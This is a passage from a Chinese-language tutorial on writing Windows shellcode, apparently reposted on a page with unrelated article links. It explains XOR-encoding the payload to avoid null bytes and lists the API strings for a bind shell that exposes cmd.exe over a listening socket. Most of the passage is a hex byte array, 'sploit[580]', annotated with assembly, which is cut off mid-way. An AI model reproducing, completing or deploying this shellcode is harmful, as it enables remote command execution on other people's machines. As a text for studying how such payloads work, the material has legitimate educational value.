函數(shù)地址 。但是這些函數(shù)名字都要以x0結(jié)尾的！我們的shellcode最基本的一條，
就是里面絕對不能含有x0，也不可以有回車換行.
解決的辦法，就是先對字符串表進行編碼（好嚇人）處理，處理掉所有的非法字符，
shellcode在使用前，由一個子程序來進行解碼 。
我使用的方法就是對字符串進行 xor 0x99處理 。這樣編解碼就是一個程序了 。
下面是編解碼程序：
0xb1, 0xc6, /* mov cl, C6 */
0x8b, 0xc7, /* mov eax, edi */
/*Xorshellcode */ /* */
0x48, /* dec eax */
0x80, 0x30, 0x99, /* xor byte ptr [eax], 99 */
0xe2, 0xfa, /* loop Xorshellcode */
呵呵，一點都不嚇人，很簡單，是不是？
我們將使用的資源列表就是前面使用的所有函數(shù)，加上"cmd.exe" 。具體為：
/****************************************************************************/
db "KERNEL32" ,0;string to push for LoadLibrary.
db "CreatePipe",0
db "GetStartupInfoA",0
db "CreateProcessA",0
db "PeekNamedPipe",0
db "GlobalAlloc",0
db "WriteFile",0
db "ReadFile",0
db "Sleep",0
db "ExitProcess",0
db "WSOCK32",0
db "socket",0
db "bind",0
db "listen",0
db "accept",0
db "send",0
db "recv",0
sockstruc STRUCT
sin_family dw 0002h
sin_port dw ?
sin_addr dd ?
sin_zero db 8 dup (0)
sockstruc ENDS
db "cmd.exe",0
dd 0ffffffffh
db 00dh, 00ah
/****************************************************************************/
4)shellcode的編寫
將前面的C程序編譯出來，提取出shellcode，然后加上前面的編解碼和函數(shù)加載模塊就可以了 。
應(yīng)用前面的設(shè)計思想，我們可以寫出來shellcode如下：
unsigned char sploit[580] = {
0x90, 0x8b, 0xfc, /* mov edi,esp */
0x33, 0xc0, /* xor eax, eax */
0x50, /* push eax */
0xf7, 0xd0, /* not eax */
0x50, /* push eax */
0x59, /* pop ecx */
0xf2, /* repnz */
0xaf, /* scasd */
0x59, /* pop ecx */
0xb1, 0xc6, /* mov cl, C6 */
0x8b, 0xc7, /* mov eax, edi */
/*Xorshellcode */ /* */
0x48, /* dec eax */
0x80, 0x30, 0x99, /* xor byte ptr [eax], 99 */
0xe2, 0xfa, /* loop Xorshellcode */
0x33, 0xf6, /* xor esi, esi */
0x96, /* xchg eax,esi */
0xbb,0x99, 0xe8, 0x61, 0x42, /* mov ebx, &LoadLibrary */
0xc1, 0xeb, 0x08, /* shr ebx, 08 */
0x56, /* push esi */
0xff, 0x13, /* call dword ptr [ebx] */
0x8b, 0xd0, /* mov edx, eax */
0xfc, /* cld */
0x33, 0xc9, /* xor ecx, ecx */
0xb1, 0x0b, /* mov cl, 0B */
0x49, /* dec ecx */
/* loadKernelProcess */ /* */
0x32, 0xc0, /* xor al, al */
0xac, /* lodsb */
0x84, 0xc0, /* test al, al */
0x75, 0xf9, /* jne loadKernelProcess */
0x52, /* push edx */
0x51, /* push ecx */
0x56, /* push esi */
0x52, /* push edx */
0xb3, 0xe4, /* mov bl, e4 &GetProcAddr */
0xff, 0x13, /* call dword ptr [ebx] */
0xab, /* stosd */
0x59, /* pop ecx */
0x5a, /* pop edx */
0xe2, 0xec, /* loop loadKernelProcess */
/* */
0x32, 0xc0, /* xor al, al */
0xac, /* lodsb */
0x84, 0xc0, /* test al, al */
0x75, 0xf9, /* jne 00000176 */
0xb3, 0xe8, /* mov bl, e8 */
0x56, /* push esi */
0xff, 0x13, /* call dword ptr [ebx] */
0x8b, 0xd0, /* mov edx, eax */
0xfc, /* cld */
0x33, 0xc9, /* xor ecx, ecx */
0xb1, 0x06, /* mov cl, 06 */
/* loadSocketProcess */
0x32, 0xc0, /* xor al, al */
0xac, /* lodsb */
0x84, 0xc0, /* test al, al */
0x75, 0xf9, /* jne loadSocketProcess */
0x52, /* push edx */
0x51, /* push ecx */
0x56, /* push esi */
0x52, /* push edx */

推薦閱讀

• 

  AutoCAD2010如何改背景顏色？ AutoCAD2010更改背景顏色步驟分享
• 

  獵奇的意思是什么意思
• 

  創(chuàng)新中國中的經(jīng)典語錄
• 

  家里怎么清理鯽魚，家里怎么清理鯽魚刺
• 

  夢見和別人下象棋是什么意思 夢見和別人下象棋的意思
• 

  iPhone11的屏幕刷新率是多少
• 

  有關(guān)立冬的手抄報 立冬的手抄報怎么畫
• 

  《星際爭霸2》蟲族雷獸設(shè)計缺考究，泛用度過低
• 

  行駛證抵押貸款怎么抵押？行駛證抵押貸款介紹！
• 

  抗疫簡筆畫怎么畫抗疫簡筆畫畫法
• 

  寶雞的房價為什么漲了，寶雞房價還會漲嗎
• 

  東莞比亞迪g6二手車，G6二手大概多少錢
• 

  法斗懷孕要注意哪些問題？法國斗牛犬懷孕注意事項
• 

  單招和高考有什么不同呢,單招和高考有什么區(qū)別
• 

  考上大學(xué)送什么禮物
• 

  老人帶娃常見誤區(qū)有哪些

• 卡西歐12點會響怎么關(guān)
• 對L7的感受
• 榮耀v30pro有關(guān)閉下拉搜索嗎 榮耀v30pro可以關(guān)閉下拉搜索嗎
• “木馬下載器”病毒出現(xiàn)新變種
• win7桌面圖標怎么變小
• 篤行致遠的下半句 篤行致遠出自哪里
• 再談?wù)?80I幾個缺點
• 假冒Windows“防毒”代碼出洞
• 高手教您手工破解網(wǎng)吧系統(tǒng)限制
• 電飯煲煮雞蛋冷水下鍋要多久